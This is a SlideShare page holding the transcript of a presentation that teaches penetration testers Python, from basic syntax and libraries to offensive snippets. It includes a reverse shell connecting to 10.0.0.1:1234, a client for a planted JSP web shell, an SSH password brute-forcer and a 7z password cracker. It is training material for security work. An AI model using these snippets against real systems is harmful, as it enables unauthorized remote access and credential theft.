Python for Penetration testers
Upcoming SlideShare
Loading in...5
×
 

Python for Penetration testers

on

  • 2,996 views

Quick presentation on how a penetration tester can start using Python to automate many of the task, create new tools, etc. For my colleagues..

Quick presentation on how a penetration tester can start using Python to automate many of the task, create new tools, etc. For my colleagues..

Statistics

Views

Total Views
2,996
Views on SlideShare
2,611
Embed Views
385

Actions

Likes
5
Downloads
78
Comments
0

4 Embeds 385

http://www.mehmetince.net 368
https://twitter.com 14
http://feedly.com 2
http://digg.com 1

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Python for Penetration testers Python for Penetration testers Presentation Transcript

  • Why?™  EASY (install, learn, code)™  Tons of libraries™  Code is easy to understand™  Multiplatform™  Good for prototyping
  • History™  Conceived in late 80´s and first implementation in 1989™  Created by Guido Van Rossum™  Benevolent Dictator for Life™  Actually there are two branches 2.x and 3.0
  • Python 101™  Interpreted language™  Object oriented™  Indentation is significant in Python, block delimiter.™  Usual control structures (if, while, etc)™  Multiple levels of organization (function, classes, modules, packages)
  • Who is using Python?™  Core Impact ™  ImmunityDebugger™  Canvas ™  Peach™  W3AF ™  Sulley™  Sqlmap ™  Paimei™  Impacket ™  Scapy™  Google ™  Spike Proxy
  • Python 101Data types: ™  Strings - “Hello” ™  Numbers - 123 ™  Lists – [‘hello’,’2’,’1’] ™  Tuples - (‘1’,’2’,’3’) (immutable) ™  Dictionaries – d = {‘key1’:’dog’,’key2’:’cat’}
  • Python 101Structures:list=[1,2,3,4,5] if 3 > x: print “ 3 is bigger than” + x for x in list: else: print x print “ 3 is smaller than” + x
  • Python 101Example Hello World: print “Hello World” With variables: msg=“Hello World” print msg
  • Python 101™  Interactive python shell™  The commands execute line per line as you type™  Good for testing small pieces of code as loops, regex, etc™  Type “python” and enter to access the shell
  • Python 101™  Strings starts counting in 0 and can have also negative indexes™  msg[0] is H™  msg[-1] is d
  • Basic Code bitsimport sysofile = ”names.txt”fil = open(ofile,w’)x = fil.readlines()for y in x: print y
  • Urllib2™  Library to deal with HTTP import urllib2 response = urllib2.urlopen(http://python.org/) html = response.read() print html
  • Basic fuzzerimport sys, urllib2 ofile = ”dirs.txt” fil = open(ofile,w) dirs = fil.readlines() for x in dirs: response = urllib2.urlopen(http://python.org/’+x) html = response.read()
  • Encodingimport base64 string=“TEST” base64.standard_b64encode(string) VEVTVA== import hashlib m=hashlib.new(md5’) m.update(string) res = m.hexdigest() print res 033bd94b1168d7e4f0d644c3c95e35bf
  • Generic Console for Web Remote Executionimport httplib, urllib, sys host=”XXXXXXXXXX” while 1: cmd=raw_input("Exploited@"+host+"#>") if cmd=="exit": sys.exit() else: h = httplib.HTTP(host) cmd=urllib.quote(cmd) print cmd h.putrequest(GET,”/myconsole123/my-shell.jsp?pass=1231&cmd="+cmd) h.putheader(Host, host) h.putheader(User-agent, Internet Explorer 6.0 ) h.endheaders() returncode, returnmsg, headers = h.getreply()
  • 7 Zip Crackerimport os, sys, pylzma from py7zlib import Archive7z, NoPasswordGivenError, WrongPasswordError pas = open(passwords.txt, rb) password=pas.readlines() for x in password: try: fp = open(test.7z, rb) archive = Archive7z(fp, password=x) print ”The password is" + x sys.exit() except Exception, e: fp.close()
  • A Web browser#!/usr/bin/env python import sys from PyQt4.QtCore import * from PyQt4.QtGui import * from PyQt4.QtWebKit import * app = QApplication(sys.argv) web = QWebView() web.load(QUrl("http://www.edge-security.com")) web.show() sys.exit(app.exec_())
  • One line Webserver™  python -m SimpleHTTPServer 8080
  • SSH Bruteforcert = paramiko.Transport(hostname)try: t.start_client()except Exception: x=0try: t.auth_password(username=username,password=passw)except Exception: x=0if t.is_authenticated(): print “Password found “ + passw
  • Proxy Strike Deflate Patch™  Pd contains the POST DATA in the repeat function: import zlib defla= zlib.compress(pd)
  • Reverse Shellimport socket,subprocess,oss=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("10.0.0.1",1234))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)p=subprocess.call(["/bin/sh","-i"])
  • Win32Com™  Library that allows us to access COM objects in Win32 systems™  We can automate Word, Excel, Powerpoint, access WMI, AD, etc
  • Massive printingfrom win32com import clientimport timeword = client.Dispatch("Word.Application”)def printPDFDocument(filename): word.Documents.Open(filename) word.ActiveDocument.PrintOut() time.sleep(5) word.ActiveDocument.Close() word.Quit()printPDFDocument("c:test.doc")
  • Excel Processingfrom win32com.client import Dispatch xlApp = Dispatch("Excel.Application") xlApp.Visible = 1 xlApp.Workbooks.open("test.xls") for x in range(1,100): nombre=str(xlApp.ActiveSheet.Cells(x,5)) print nombre xlApp.Quit()
  • WMIimport wmic = wmi.WMI ()for process in c.Win32_Process (): print process.ProcessId, process.Name
  • Interesting stuff™  http://dirk-loss.de/python-tools.htm™  http://code.activestate.com/recipes/langs/python/